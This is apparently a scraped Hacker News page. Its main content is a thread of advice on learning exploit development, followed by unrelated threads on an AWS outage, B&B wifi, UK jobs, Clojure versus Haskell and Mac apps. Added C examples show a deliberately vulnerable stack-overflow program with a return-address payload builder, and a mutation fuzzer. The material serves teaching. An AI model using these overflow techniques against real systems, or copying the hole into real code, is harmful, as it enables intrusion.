To start, I'd say have a good C manual (K&R), have a good book for computer systems (Computer Systems by Randy Bryant, but there are other good ones) and a good documentation on gdb. gdb is where it begins.

21
adrusi 1 day ago 0 replies      
This question reminds me of when people in my school ask me "where did you learn all this computer stuff?"

You can't make a list of resources that will get you to your goal, you can make one that will give you the foundational knowledge you need to start, but after that you just need to live in the right mindset and start doing it.

I'm not an exploit developer, but I'd imagine that the following would be useful practice:

1) Find a famous exploit, and read about what it accomplished but not how it was done. Then attempt to redo it. When you get stuck, look at what the original exploit did and continue from there.
2) Do the above on a heavily exploited technology, but only read about a few of the exploits. While attempting to exploit in one way, keep your eye out for other holes that you can exploit and develop an exploit that you hadn't even heard of before. It's probably already been done, but you came up with it independently.
3) Now try the same on something less exploited, but still with at least one exploit that you can follow along with. Try to develop a completely original exploit in this way.
4) Now find something unexploited and dig around for an exploit. Now you have enough practice that you should have the ability to identify a potential exploit when confronted with it.

Of course, you should repeat each of the above steps at least a few times before moving on to the next.

22
jdefr89 1 day ago 0 replies      
If you want to learn to develop exploits I would read some of these few sources to get started...

1. The Shellcoder's Handbook
2. Hacking: The Art of Exploitation
3. Gray Hat Hacking
4. w00w00 Exploiting Heaps

Basically memory exploits all boil down to overwriting the EIP with an address that points to some code that does something.

Of course there are all sorts of exploits, some simply send bad data to crash the server as a Proof of concept.. others are more sophisticated, either way if you can program all you need to do is learn a few methods and then writing the exploit shouldn't be so bad..
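
A toy program of the kind raverbashing ("create a toy exploitable program, and you start exploiting that") and jdefr89 ("overwriting the EIP with an address that points to some code") describe, as an added example that is not part of the thread. It assumes a 32-bit build with protections off (the compile flags in the comment are an assumption), and the 64-byte buffer, the 68-byte offset to the saved return address and the address 0x08049196 for win() are illustrative values; on a real build you find the offset and the address with gdb, as several commenters suggest.

```c
/* Added example, not from the thread: a toy "exploits 101" target and the
 * payload an exploit for it would deliver. Assumes a 32-bit build with the
 * usual protections switched off, e.g.
 *   gcc -m32 -fno-stack-protector -z execstack -no-pie -o toy toy.c
 * Buffer size, offsets and the target address are illustrative assumptions. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_SIZE 64

/* Where the exploit wants execution to land; nothing calls it legitimately. */
void win(void) {
    puts("control flow hijacked");
    exit(0);
}

/* The broken assumption: "input always fits in 64 bytes". strcpy has no
 * length check, so a longer input runs past buf into the saved frame
 * pointer and the saved return address (EIP) above it on the stack. */
void vuln_copy(const char *input) {
    char buf[BUF_SIZE];
    strcpy(buf, input);
    printf("copied %zu bytes\n", strlen(buf));
}

/* Hardened form: require a terminator inside the buffer bound before
 * copying, and report oversize input instead of trusting it.
 * Returns the copied length, or -1 when the input does not fit. */
int safe_copy(const char *input) {
    char buf[BUF_SIZE];
    const char *nul = memchr(input, '\0', BUF_SIZE);
    if (nul == NULL)
        return -1;                      /* no NUL within 64 bytes: would overflow */
    size_t n = (size_t)(nul - input);
    memcpy(buf, input, n + 1);
    return (int)n;
}

/* Classic 32-bit stack layout: [buf][saved EBP][saved EIP]. Fill everything
 * up to the return address with filler, then write the target little-endian
 * in its place. strcpy stops at the first NUL, so a target with a zero byte
 * anywhere but its last (most significant) byte cannot be delivered this
 * way and is rejected. Returns the payload length (without the terminating
 * NUL), or 0 on error. */
size_t build_payload(uint8_t *out, size_t out_len,
                     size_t offset_to_ret, uint32_t target) {
    size_t total = offset_to_ret + 4;
    if (out_len < total + 1)
        return 0;
    for (int i = 0; i < 3; i++)
        if (((target >> (8 * i)) & 0xffu) == 0)
            return 0;                   /* bad byte: strcpy would truncate here */
    memset(out, 'A', offset_to_ret);
    for (int i = 0; i < 4; i++)
        out[offset_to_ret + i] = (uint8_t)(target >> (8 * i));
    out[total] = '\0';
    return total;
}

/* With an argument: act as the vulnerable target. Without one: emit the
 * payload, so `./toy "$(./toy)"` feeds the exploit to the target. */
int main(int argc, char **argv) {
    if (argc > 1) {
        vuln_copy(argv[1]);
        return 0;
    }
    uint8_t payload[256];
    /* 64-byte buffer + 4-byte saved EBP = 68 bytes to the return address;
     * 0x08049196 stands in for the address of win() read from the binary. */
    size_t n = build_payload(payload, sizeof payload, BUF_SIZE + 4, 0x08049196u);
    fwrite(payload, 1, n, stdout);
    return 0;
}
```

The bad-byte check is the detail that trips people up first: a return address such as 0x08040096 has a zero in its second byte, so strcpy would stop copying before the address is complete. Whether the real distance to the saved EIP is 68 or something else depends on how the compiler lays out the frame, which is what the "get very good at gdb" advice elsewhere in the thread is about.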

23
bluesmoon 1 day ago 0 replies      
There's a lot of good advice here. I'll limit this post to how I learnt. I'd never really read any articles before starting out on my own. For me it was mainly curiosity. I was writing code with a bunch of guys at school, and one of the guys wanted to protect his data (on a shared data store), so he implemented his own encryption scheme. I didn't know anything about encryption, but had access to his source code, so studied his algorithm and managed to build a decoder.

After that I started studying my own programs to see if there were any obvious patterns that someone else could guess. This was before the days of CGI on the web.

My curiosity continued when CGI was growing and I learnt first how to fool a guest counter, and then how to build a more secure one. I started learning perl and read all the man pages. There was a lot of stuff in there that was like "don't do this because it's insecure". To that end I owe a lot to Larry, Randall, and Tom.

What I learnt from there helped me protect myself against XSS attacks, but also taught me what to look for without needing the source. It was a while before I heard about CSRF attacks. At this point I was interested enough to see what OWASP listed as the top exploits and did some studies on each of them.

At no point have I ever used what I know for malicious purposes.

24
Mvandenbergh 1 day ago 0 replies      
I see a few other people have already recommended resources for learning about vulnerability discovery, which is mainly about fuzzers these days.
A good resource for determining how to exploit that vulnerability so that it does neat things for you is The Shellcoder's Handbook (some asm required, but not too hard if you know some OS internals).
25
erikb 1 day ago 0 replies      
I'd agree with most what saurik said. Mindset is one of the most important things about anything. It's always not about WHAT you do, but about HOW you do it. A person who really learns is someone, who views himself while he does something and repeats it later on to discover what he did, how he did it and what else he could've done.

But that's not the reason why I'm writing here. Since I started to get better at anything I'm doing, I realised that it's always about the little things. If you see someone do one thing that is small, great and everybody loves it, then what actually happened was that this person did millions of small steps that were stupid before. You just didn't see it. Millions, it's not a joke! And of all these things, a lot of them are about just learning boring things. If you want to become a cracker (I'm morally neutral, so I don't really care WHAT you want to become), then you should start out with learning to code and to learn to code quite well. Then you should learn all about how the internet works. That means learning to code more, and then to also learn all about the network protocols and layers and also about how the hardware is wired. Learning all this will automatically show you the limits of what security can achieve (for example you will understand naturally that there can't be a perfect code. Every code must contain the information it tries to hide, somewhere. So every code will be broken some day.) and also where people made mistakes. And if you have the right mindset you will find ways to hack systems that don't even involve circumventing security systems.

To make a long story short: You need both, mindset and a lot of knowledge.

26
philfreo 1 day ago 0 replies      
The easiest way to learn how to exploit is to learn how to prevent exploits in your own code. There are usually lots of tutorials/articles from that point of view. Some easy examples: once you've learned what SQL injection or XSS is and how to prevent it, it becomes easy (almost a habit) to look to see if other apps have done the same.
27
deyan 1 day ago 0 replies      
Fravia's portal on reverse engineering used to be a great starting point. Starting with Assembly and (old) Phrack articles as others have suggested is a great idea as well.
28
krenoten 1 day ago 0 replies      
Two things: understanding and manipulating.

1. Understand what a program is. How the architecture of your computer allows it to run programs. How to look into the guts of a program - currently running or while dormant - and figure out how it processes any and all input you are able to feed it. What mechanisms are in place to prevent exploits.

2. Study bug classes and exploitation techniques. Information leaks are often important to remotely exploit code protected by ASLR. Build fuzzers. Use a tool like the absolutely incredible Vivisect recently released by visi at SummerCon a few days ago to see whether it is possible to get to a vulnerable code segment from the entry points you are able to find. Craft input to reach the identified bug, and leverage it to achieve arbitrary code execution. Never forget that while your focus may be zoomed in on a handful of opcodes, there is in fact an entire system environment in place and potentially at your disposal.

It's a daunting amount of information. Many of the best have been taught via something reminiscent of oral tradition, and like anything you wish to achieve mastery of you will learn faster with feedback from those with more experience. Most public hacker forums are about downloading tools for SQLi and have nothing to do with exploit development at all. But make some friends who are good at it and seek their feedback.

I guess start off by reading the corelan exploit tutorials, which go pretty deep pretty fast and may be a good start for somebody with programming experience. Simultaneously work through the reversing tutorial by lena on tuts4u. I think that may be a good start.
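
The "build fuzzers" step from krenoten's list, which is also what Mvandenbergh means by vulnerability discovery being "mainly about fuzzers these days", as an added example that is not part of the thread. The target, its two-byte record header, the planted bug and the seed input are all constructed for illustration; the bounds check that reports PARSE_CRASH stands in for what a sanitizer or a segfault would report against a real parser.

```c
/* Added example, not from the thread: a minimal in-process mutation fuzzer
 * against a toy parser with a planted bug. Record format, bug and seed are
 * constructed; the loop (mutate seed, run target, watch the oracle, keep the
 * input that trips it) is the part that carries over to real targets. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_LEN 64

enum { PARSE_OK = 0, PARSE_SHORT = 1, PARSE_CRASH = -1 };

/* Toy record: [type:1][len:1][payload:len]. The bug is the assumption
 * "len never exceeds the bytes actually received". The check on len stands
 * in for the out-of-bounds read a sanitizer would flag in a real target. */
int parse_record(const uint8_t *p, size_t n, uint8_t *type_out, uint32_t *sum_out) {
    if (n < 2)
        return PARSE_SHORT;
    uint8_t type = p[0];
    size_t len = p[1];
    if (len > n - 2)
        return PARSE_CRASH;              /* would read past the end of p */
    uint32_t sum = 0;
    for (size_t i = 0; i < len; i++)
        sum += p[2 + i];
    if (type_out) *type_out = type;
    if (sum_out) *sum_out = sum;
    return PARSE_OK;
}

/* xorshift32: deterministic, so a crashing run can be replayed from its seed. */
static uint32_t rng_state;
static uint32_t rng_next(void) {
    uint32_t x = rng_state;
    x ^= x << 13; x ^= x >> 17; x ^= x << 5;
    return rng_state = x;
}

/* Apply 1-3 random mutations in place: flip a bit, overwrite a byte, or
 * grow/shrink the input by one byte. Returns the new length. */
size_t mutate(uint8_t *buf, size_t len) {
    int rounds = 1 + (int)(rng_next() % 3);
    for (int r = 0; r < rounds; r++) {
        uint32_t op = rng_next() % 3;
        if (op == 0 && len > 0) {
            size_t i = rng_next() % len;
            buf[i] ^= (uint8_t)(1u << (rng_next() % 8));
        } else if (op == 1 && len > 0) {
            size_t i = rng_next() % len;
            buf[i] = (uint8_t)rng_next();
        } else if (op == 2) {
            if (len < MAX_LEN && (rng_next() & 1u))
                buf[len++] = (uint8_t)rng_next();
            else if (len > 0)
                len--;
        }
    }
    return len;
}

/* Run up to max_iters mutated inputs derived from the seed. On the first
 * crash, copy the offending input to crash_out and return the 1-based
 * iteration number; return 0 if nothing crashed (or the seed is too long). */
size_t fuzz(const uint8_t *seed, size_t seed_len, uint32_t rng_seed,
            size_t max_iters, uint8_t *crash_out, size_t *crash_len) {
    uint8_t buf[MAX_LEN];
    if (seed_len > MAX_LEN)
        return 0;
    rng_state = rng_seed ? rng_seed : 1u;   /* xorshift must not start at 0 */
    for (size_t it = 1; it <= max_iters; it++) {
        memcpy(buf, seed, seed_len);
        size_t len = mutate(buf, seed_len);
        if (parse_record(buf, len, NULL, NULL) == PARSE_CRASH) {
            if (crash_out) memcpy(crash_out, buf, len);
            if (crash_len) *crash_len = len;
            return it;
        }
    }
    return 0;
}

int main(void) {
    const uint8_t seed[] = { 0x01, 0x03, 'a', 'b', 'c' };   /* constructed seed */
    uint8_t crash[MAX_LEN];
    size_t crash_len = 0;
    size_t it = fuzz(seed, sizeof seed, 12345u, 100000, crash, &crash_len);
    if (it == 0) {
        puts("no crash found");
        return 0;
    }
    printf("crash at iteration %zu, input:", it);
    for (size_t i = 0; i < crash_len; i++)
        printf(" %02x", crash[i]);
    putchar('\n');
    return 0;
}
```

Two things are worth noticing. The bug is found by both a truncated record (the shrink mutation) and an inflated len byte (the overwrite mutation), which is why a fuzzer needs more than one kind of mutation. And because the generator is seeded, the crashing input is reproducible, which is the precondition for the "craft input to reach the identified bug" step that follows.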

29
wslh 1 day ago 0 replies      
Look at "Insecure Programming by example": http://community.coresecurity.com/~gera/InsecureProgramming/
30
uki 1 day ago 0 replies      
Well exploit development is quite a broad topic - while the answers below provide answers that should pretty much help provide a certain perspective, I sure hope that this helps too.

Let's start off with Web-application security - the most common of attack vectors are detailed as part of OWASP top 10 - you can read more about specific attacks with simple google searches, there are loads of articles that do the same. In order to write exploits you can try the wargames which are present online, or download intentionally vulnerable operating systems/applications and practice on them (DVL, DVWA etc.). The techniques involved in finding these vulnerabilities include fuzzing, vulnerability scanning, source code audit and manual blackbox testing.

Another area of exploitation is that of binaries that run on a particular operating system. Such exploitation usually requires you to find the vulnerability using reverse engineering/source code audit and/or fuzzing. Writing exploits requires you to have at least a good understanding of the stack layout, calling conventions, asm and shellcode. Of course, in this case I am referring to "overflow" vulns and not logical errors.

In order to practice exploitation, you can try out wargames as they are an excellent resource. There are wargames for binary exploitation (smashthestack.org, overthewire.org), webapp hacking (hacking-lab, hackthissite.org, DVWA, and LOADS more) and crypto (overthewire.org and smashthesite.org have crypto wargames), linux admin hacking (hacking-lab has a few every now and then).

Exploit development requires one to have strong fundamentals and understand how exactly stuff works under the hood. There are quite a few books that you might find interesting based on your interests. If you are into web application hacking I'd suggest "the tangled web" and "the web application hackers handbook". If you are into binary hacking I'd suggest "the shellcoders handbook" (there are so many more awesome ones but this one's the best to start off with IMO).

Please note that here I have answered the question "How to develop exploits" rather than questions such as "How do I develop the security mindset" and "How do I find security vulnerabilities".

Hope this helps.

[EDIT]

For purposes of learning do NOT use scanners (such as sqlmap), automation frameworks (e.g. msf for generating shellcode). While I think these tools are AWESOME, they should only be used once you have learnt how they work and when you reach a level that you feel you are unnecessarily doing work that could be automated.

31
pandemicsyn 1 day ago 2 replies      
I'm not sure about recent versions but the first edition of "Hacking: The Art of Exploitation" was great a few years ago.
32
leif 1 day ago 0 replies      
get a random version of wuftpd from the archives. it likely has multiple exploits waiting for you, probably even a remote root

if you need some hints, search "wuftpd remote root" to see the form they often take

33
tshadwell 1 day ago 0 replies      
Learn the oddities and the specifics in the parsing of a language, keep in memory problems with a very easy, and vulnerable solution and keep your eyes peeled. If you're awake, sometimes you think "This looks vulnerable..." and investigate. If you're lucky, something will go wrong in the site and you press on.
34
jonaslejon 1 day ago 1 reply      
The best way is to start from the beginning, in other words read "Smashing the stack for fun and profit". These techniques don't work on current operating systems but give you a great start http://insecure.org/stf/smashstack.html
35
paisible 1 day ago 0 replies      
check out io.smashthestack.org : awesome wargame with 20+ levels, definitely will give you somewhere to start digging your teeth in.
7
Post-Mortem of AWS Outage
20 points by dlgeek  20 hours ago   5 comments top 2
1
dlgeek 20 hours ago 1 reply      
What I found most remarkable was how in-depth their backup systems were and how many things had to go wrong for this to become an event.

This happened because they lost primary power AND had a generator fail AND had a distribution breaker fail. I wonder how often any two of those happen without us ever knowing about it...

2
mw642 18 hours ago 1 reply      
Wow! A proper outage post-mortem that isn't babbling on about control rods. I love it.
8
Ask HN: Which APIs flirttape is using for song search?
4 points by motyar  9 hours ago   2 comments top 2
1
flexterra 1 hour ago 0 replies      
Hi, I'm part of the team that made flirttape and I can confirm that we are using YouTube as our source of media.
2
badabadam 9 hours ago 0 replies      
youtube.
9
Ask HN: How do you make sure a B&B has wifi in the room?
18 points by johnnyg  18 hours ago   18 comments top 9
1
MehdiEG 18 hours ago 2 replies      
Running a couple of online businesses that require us to have online access wherever we are (it's always when you decide to go away for a week that the site goes down or an army of spammers targets your members), this is a problem we constantly run into whenever we go away, be it on holidays or for business.

There's nothing like that yet as far as I know. Most hotels and B&B will indicate whether they've got wifi access. Typically, if wifi isn't mentioned, it means no wifi.

But knowing that wifi is available isn't actually all that helpful. You'll often find that wifi is available but costs more than the room itself. Or, even more often, it just doesn't work or is unusably slow.

So we always try to get a place with wifi but also always carry an unlocked MiFi with us. In the UK, you can get one for £50 on PAYG on Three and unlock it for a few quid. PAYG data topups in the UK on Three are reasonably priced (£15 for 3GB of data). When we go abroad, we first check this wiki to find local operators with decent PAYG data plans and we buy a local SIM card as soon as we land: http://prepaidwithdata.wikia.com/wiki/Prepaid_SIM_with_data

It's a hassle but if you really need internet access, that's the only option at the moment I'm afraid. There is definitely a niche for a way to identify hotels and B&B with free / reasonably priced and reliable wifi connection (and also cafés while we're at it - it's an incredible pain to find a café with working wifi).

2
neilk 18 hours ago 0 replies      
AirBnb allows you to constrain a search to properties that have Internet, Wireless Internet, and Breakfast.

Do a search, then look on the right side of the page for the "Amenities" widget (you have to scroll all the way down). You could also add "beach" and/or "ocean" as a keyword in the widget right under that.

Voila.

http://www.airbnb.com/search?location=California&keyword...

3
fleitz 17 hours ago 0 replies      
I would recommend two tools, one is called email and the other is called the phone. Depending on whether the place has an email address or a phone select the appropriate tool, contact the proprietor and inquire as to whether his establishment will be suitable for your purposes.

Given that you're using tools used to sell bed and breakfasts on the internet, chances are high that the proprietor has both breakfast AND wifi.

4
citricsquid 18 hours ago 0 replies      
Seems like something you could use a site like exec or taskrabbit for. Have a "personal assistant" call around some different B&Bs (or even have them find B&Bs for you) and get info on their wifi.
5
Lucadg 17 hours ago 0 replies      
I have been working online for many years now and I share your pain :)

I don't think relying on the information the Owners give can be a solution.
They want to sell and they'll consider their shared wifi connection always "fast", whatever that means.

We have developed a niche platform for vacation rentals which would allow you to build a website dedicated just to vacation rentals with internet connection.
(some call it an Airbnb builder, but this is not accurate for many reasons. One of them is that we don't do peer to peer).

Anyone wanting to open a small business to fill this niche could use our CMS to build the site and select the accommodations from the thousands we have.
We have local Managers who visited personally most of these Owners and Accommodations, so they can provide you with hard data such as Actual Internet Speed.
SpeedTest.net results for instance.

This is different from letting the Owners check that "wi-fi" checkbox.

I had the "only fast internet accommodations" idea a long time ago, but we're waiting for the right person/team to come in and do it.

The system is http://www.adormo.com and these are some other niches we built already just to give you an idea:
http://www.topfamilyhomes.com
http://www.kitesurfsleep.com
http://www.petfriendlystays.com

If anybody is passionate to solve this problem with us, please send us an email!

6
benologist 18 hours ago 2 replies      
I've been thinking about this for a while since I travel so much, I think there is a market although I don't know how profitable it'd be.

A site full of hotel wifi ratings, speeds and passwords would be so awesome. Kind of like bugmenot or maybe hipmunk with an agony rating for hotels.

7
Freestyler_3 18 hours ago 0 replies      
Give them a call?

Better than searching through sites when a lot of the time they don't have that info on it.

It should be listed though... it should.

8
rhizome 18 hours ago 0 replies      
I live in San Francisco. When I was last shopping for a car, the car's dimensions were one of the primary criteria I used to decide. No auto website supplies this information, much less let you query upon it, so I was reduced to pad-and-paper and Wikipedia. I have thought over the years that there "should be" a site that centralizes all of this arcana, but whether there's a market niche here I haven't found it. Heck, even Newegg et al, retail sites that use search facets (sidebar filters) have poor content and/or underimplemented details.

So, it's probably worth more to complain to BedAndBreakfast.com to be doing this since they likely already pay someone to pursue details like the ones they already have. They probably just don't think it's very important and nobody is telling them otherwise.

9
Toph 17 hours ago 0 replies      
Doesn't solve your exact problem but we own a couple hotspot devices. We don't always have a need for them but use them at least a couple times a month on the go around town so they are more than worth it. When you add in trips whether for vacation, business, or anything else, boy do they come in handy. Take a look.
10
OSX apps that keep you hooked to your Mac?
3 points by factorialboy  11 hours ago   12 comments top 9
1
bbgm 10 hours ago 0 replies      
Omnifocus (Omni products in general), Keynote, Alfred, Papers2, Scrivener (although there is a Windows version now), All the text editor options (Notational Velocity, Nottingham, etc)
2
runjake 10 hours ago 0 replies      
Notational Velocity. I know about ResophNotes, etc, but they don't cut it.
3
shasty 10 hours ago 0 replies      
OSX itself keeps me hooked to my Mac. I can find anything I need for this platform. The whole is greater than the sum of its parts.
4
shebson 10 hours ago 1 reply      
It's only loosely an app, but having a real unix terminal (without having to run a VM) is the biggest reason I'm hooked.
5
joshstrange 2 hours ago 1 reply      
XCode
6
jayfuerstenberg 6 hours ago 0 replies      
MarsEdit & Coda
7
cpt1138 11 hours ago 0 replies      
Inspector and Omnifocus
8
codyjames 11 hours ago 0 replies      
Alfred
9
dylanhassinger 11 hours ago 0 replies      
Finder
11
Question: Getting a Job and Moving to UK
6 points by thekillerdev  20 hours ago   6 comments top 6
1
jdietrich 18 hours ago 0 replies      
UK companies can hire workers from anywhere within the EU without any sort of bureaucracy - EU citizens have an automatic right to work anywhere in the EU. The EU includes a number of low-wage countries with good numbers of skilled developers.

There is currently some amount of anti-immigration sentiment in many EU countries, mainly because of the recession. Governments can do nothing to restrict intra-EU migration, so tend to make life hard for non-EU migrants to look tough on immigration. The current British government is tightening quotas on non-EU immigration.

A British company is unlikely to even look at your CV if there's another qualified applicant in the pile, because of the cost and complexity of employing a non-EU worker.

There is no shortage of generalist developers in the UK and wages are significantly lower than in the US. Unless you have some specialised skills, your job search is likely to be quite arduous.

2
Peroni 8 hours ago 0 replies      
Shameless plug: http://www.hackerjobs.co.uk

As others have pointed out, it's near impossible to find an employer willing to assist you in the process in gaining the appropriate visas. Time and effort aside, immigration law in the UK is a legal minefield and unless the company has a previous history of hiring non-EU nationals then they probably won't even look at your CV unfortunately.

3
ig1 17 hours ago 0 replies      
It's become a lot harder to get work visas for the UK since they closed the Tier-1/HSMP program a few years ago. Under the new visa system the only people who are likely to be willing to sponsor you are large firms (IBM, Google, investment banks, etc.) who have the capacity to deal with the overheads required.
4
thekillerdev 17 hours ago 0 replies      
Hello oschrenk, I often use this website http://uk.authenticjobs.com/ but mostly I search on google for UK companies and send them the CV.

jdietrich, it is good to know about those things, actually I have been struggling to find news about this but I think it's just a general sentiment and not a guideline..

ig1 and jacknews, you both are right for sure, I've got this feeling from the companies, they are really looking for exceptional skills and not hiring anyone who can be replaced by local talent.

Thanks for clarifying even if it's an almost no-hope effort.

5
jacknews 17 hours ago 0 replies      
Most countries have a policy of only issuing work visas to foreigners who have an exceptional skill.
That is, the role can't be filled by local talent. I'm not sure web design/development alone meets that definition.
In addition, the paperwork is onerous for any hiring company.
Why do you think you have the right to work in the UK?
6
oschrenk 18 hours ago 0 replies      
I'm planning to try the same. Would you have some pointers where to start my job search? Did you write to specific companies or did you start your search by crawling job offer sites?
12
Ask HN: Clojure vs Haskell for a first functional language?
10 points by samrat  1 day ago   13 comments top 10
1
fmstephe 1 day ago 1 reply      
I would strongly back Haskell for this purpose. The reason for this is principally that Haskell is a single install, (whereas Clojure requires the jvm first and then Clojure). Haskell is a single language, Clojure is java with Clojure running on top.

When I started learning to program the greatest joy was code=some result. The greatest misery was installation, configuration and bizarro error messages. In this regard I think Haskell comes out far far ahead. When I first learned Haskell I remember installing Hugs was simple and the REPL worked immediately.

I think that the number one consideration for a first time programming language is the ease with which you can get working software that does something and gives feedback. Clojure has too many leaky abstractions and is not nearly as simple to get up and running. (Aside, I like Clojure)

I think that what I am reading as an implicit question of "should a programmer be initially exposed to the greatest type system known to man in Haskell or the one-true programming language in Lisp" is taking the wrong approach. We should ask "how can I expose a programmer to the joy of making things using only a brain and a keyboard". I suspect that many of the best Haskell and Lisp hackers we have got started on Visual Basic because it was so accessible.

I would be tempted to say Javascript may be an even better answer. Easy to get started and a browser and a text editor makes for a great IDE.

I apologise if my characterisation of your question was wrong. It's not my intention to be offensive or stir up trouble. Those are two great languages to choose from, if you can capture the mind and imagination of a first time programmer with either of them they will be off to a great start.

2
adrusi 22 hours ago 0 replies      
I learned scheme first, then haskell, then (now) clojure. I think haskell is best for teaching functional programming because it's purely functional and puts focus on that aspect rather than on performance benefits of being functional. after ~1 year with it, I've decided that haskell, while great, is not for me, and I'm switching over to clojure. Clojure is very nice as a language; what it lacks in terms of a type system it makes up for with the presence of macros.

However, I don't think that clojure is quite as great for teaching functional programming, because it is an eager language unless you explicitly tell it to be lazy exactly where you want it to be, so it doesn't have the performance optimizations that haskell has with recursion (as opposed to tail-call recursion) and it's therefore discouraged to not use tail-call recursion.

Now that's my recommendation for a first functional programming language. For a first language in general, I'd recommend the reverse because with clojure you can actually start doing something practical as soon as you get started, where with haskell it takes a while to get to that point.

But the installation process is different with the two. With clojure, the language is designed around being used with a build system as part of java tradition, which means that you normally can't just type `clj` and get a REPL (at least not with the official distribution). Generally the best way to go about doing that is to install leiningen and make a new project and do `lein repl` in the project directory.

In Haskell on the other hand (with the Haskell platform installer) you can just run the installer and type `ghci` and get a REPL. If you want to run a Haskell program to test it, it's just `runhaskell file.hs` and to compile, it's as simple as `ghc --make file.hs`. But when things get more complicated, even slightly so, Haskell can be an incredible pain to deal with (in terms of compiling and such) whereas clojure, being designed around build systems for large projects, scales up just fine.

3
LukeHoersten 23 hours ago 0 replies      
Great question. I would suggest first learning a Lisp (Elisp, Clojure, Scheme, Arc, etc) and then moving to Haskell.

With Haskell, you'll be learning more than basic lambda calculus. Haskell has a lot of new concepts that traditional-language programmers may have to rewire their brains to think about. Things like lazy evaluation by default, automatic currying, a more advanced type system than most other languages and the concepts that brings like Functors, Monads, and Iteratees. Lazy IO is a rough edge which is, as we speak, in the process of being cleaned up by Iteratees.

With a Lisp, you can learn the basic concepts of lambda calculus without having to learn more advanced language features at the same time. You'll tackle things like programming in a declarative language and leveraging first-order functions. Remember, you're trading for-loops for recursion, and for some, that's enough brain rewiring without also worrying about lazy IO.

Lisp allows you to divide and conquer the multitude of language features functional languages have to offer. Why take them all on at once? Once you're comfortable with Lisp, Haskell's true benefits really start to shine. Haskell is by far my favorite language and I find myself hating programming without the features it offers, but I'm not sure I would have made it far enough to see its benefits without learning Scheme first. And learning Lisp is easy. It's a terse language which one could write a small project in in a few weeks and be ready for Haskell.

Haskell is challenging but there's a reason which I'll try to illustrate with an analogy: Calculus is more complex than arithmetic and without a more advanced problem to solve, the added complexity may not be a clear advantage. But you get to a certain point in physics where it simply becomes harder to work in only arithmetic and learning the abstraction of calculus up front pays dividends. Haskell is the same way. I'll end with PG's "The Blub Paradox" http://www.paulgraham.com/avg.html (scroll down).

4
Mikera 1 day ago 0 replies      
I think it is worth learning both. Clojure is more "practical" in the sense that it is dynamic, impure and gives you access to the huge JVM library ecosystem, which is a huge advantage for real world projects. Haskell is pure and extremely elegant in an almost mathematical sense - if you want to learn the "true essence" of functional programming then it is ideal. Overall, Clojure is my favourite because of the practicality and the fact that it is compelling for other reasons (Lisp-style metaprogramming, interactive REPL development, code-as-data philosophy, concurrency features etc.)
5
jfaucett 1 day ago 0 replies      
Haskell is "cleaner" and "purer"; if you're coming from a mathematical background it's also probably going to be easier. Since this is going to be your first programming language I'd suggest Haskell since it's certainly more elegant (in my opinion). I'm a biased Haskell enthusiast so that's my suggestion :)
6
gtani 1 day ago 0 replies      
Without taking sides, I would say look at some books on each. Kinda like comparing plutonium and uranium, or a cello to a guitar. Maybe these comparisons are silly. While you're at it look at Scala and O'Caml.

You can look at the Yesod book, Real World Haskell and "Learn You a" online, i.e. read the complete, updated texts. Thompson's orange "Craft of FP" is a good read also, with methodical (and relatively slow-paced) coverage of all the basics. GHC is piling on language features and libs at a breathless pace, from deferred type checks, limited forms of dependent types, concurrency (async loops, STM, updated thread manager), IO abstractions (conduits), web apps (Yesod)

http://hackage.haskell.org/trac/ghc/wiki/Status/May12

Clojure is an incredibly well documented (in books) language. I'm looking at the excellent O'reilly and Pragmatic books, and the 2 Manning books ("Joy of" is terrific), all of which came out in the last 4 months and target 1.3. And i will wager that Marick's book will be top notch as well. Unfortunately, these don't have texts online.

7
lhnz 22 hours ago 0 replies      
Haskell.

If you're going to learn a functional programming language learn a pure one.

8
samrat 23 hours ago 0 replies      
EDIT- I just noticed that I accidentally typed out "first programming language", what I really meant to type was "first functional programming language". Sorry, for the confusion.
9
fiatmoney 1 day ago 0 replies      
Neither is a bad choice. I'm partial to Clojure, specifically because it does integrate well with every Java library known to man. Starting out, there's a real Pavlovian benefit in being able to do something cool that "just works", and figure out the underlying principles later. It's fairly easy to take Clojure and integrate it with your machine learning library of choice, or a web framework, or Hadoop. Haskell has some of those libraries as well, but the advantage is that from the beginning you're exposing yourself to polyglot programming and it's easier to mix in some raw Java, or JRuby, or Jython...
10
ExpiredLink 23 hours ago 2 replies      
> Which is more suited for someone who's just trying to learn their first programming language?

None. Learn a language that is appropriate for beginners like Python or PHP.

13
Ask HN: Just ordered my first Mac- what apps should I know about?
31 points by olegious  17 hours ago   57 comments top 39
1
radq 17 hours ago 0 replies      
Have you seen these threads?

http://news.ycombinator.com/item?id=2147642

http://news.ycombinator.com/item?id=2161855

I found them pretty useful -- have a look!

Also have a look at this one: http://news.ycombinator.com/item?id=3407705

2
RodgerTheGreat 17 hours ago 2 replies      
Colloquy[1] is a fantastic IRC client.
TextWrangler[2] is one of my favorite text editors.
If you're familiar with Linux, you'll want a package manager- popular options are MacPorts[3] or Fink[4].
As far as media players, VLC[5] has a very nice OSX port.

[1] http://colloquy.info/
[2] http://www.barebones.com/products/TextWrangler/
[3] http://www.macports.org/
[4] http://www.finkproject.org/
[5] http://www.videolan.org/

3
mtrn 17 hours ago 1 reply      
Quicksilver http://qsapp.com/ - I never opened an application from Finder or Dock again.

From their site:

Quicksilver is a launcher utility app for Mac OS X which gives you the ability to perform common, every-day tasks rapidly and without thought. An introduction to Quicksilver's abilities include:

* Accessing applications, documents, contacts, music and much, much more.

* Browsing your Mac's filesystem elegantly using keywords and 'fuzzy' matching.

* Managing content through drag and drop, or grabbing selected content directly.

* Interacting with installed applications through plugins.

4
jherdman 17 hours ago 2 replies      
If you don't like Quicksilver, Alfred is really good too (http://www.alfredapp.com/).

Sublime Text 2 is pretty great (http://www.sublimetext.com/2).

5
CJefferson 17 hours ago 0 replies      
Try the standard Terminal, I prefer it to iTerm 2.

Homebrew or MacPorts help install unixy tools. Work on the assumption that whichever you install, at least once a year you will have to completely remove it and reinstall it, as sometimes they get in a mess.

Apple mail is OK, I prefer thunderbird, but it isn't very Macy.

VLC tends to play whatever you chuck at it.

General note - HFS tends to get unhappy (performance-wise) if your drive gets more than about 85% full.

When I first got a mac I was tempted to install lots of hacks to standard apps and the OS. These seem much less popular nowadays, but still try to resist any, at least for a while. Mac OS X is very hard to debug if it starts to misbehave.

Finally, never install the .0 version of any new OS :)

6
mtrn 17 hours ago 0 replies      
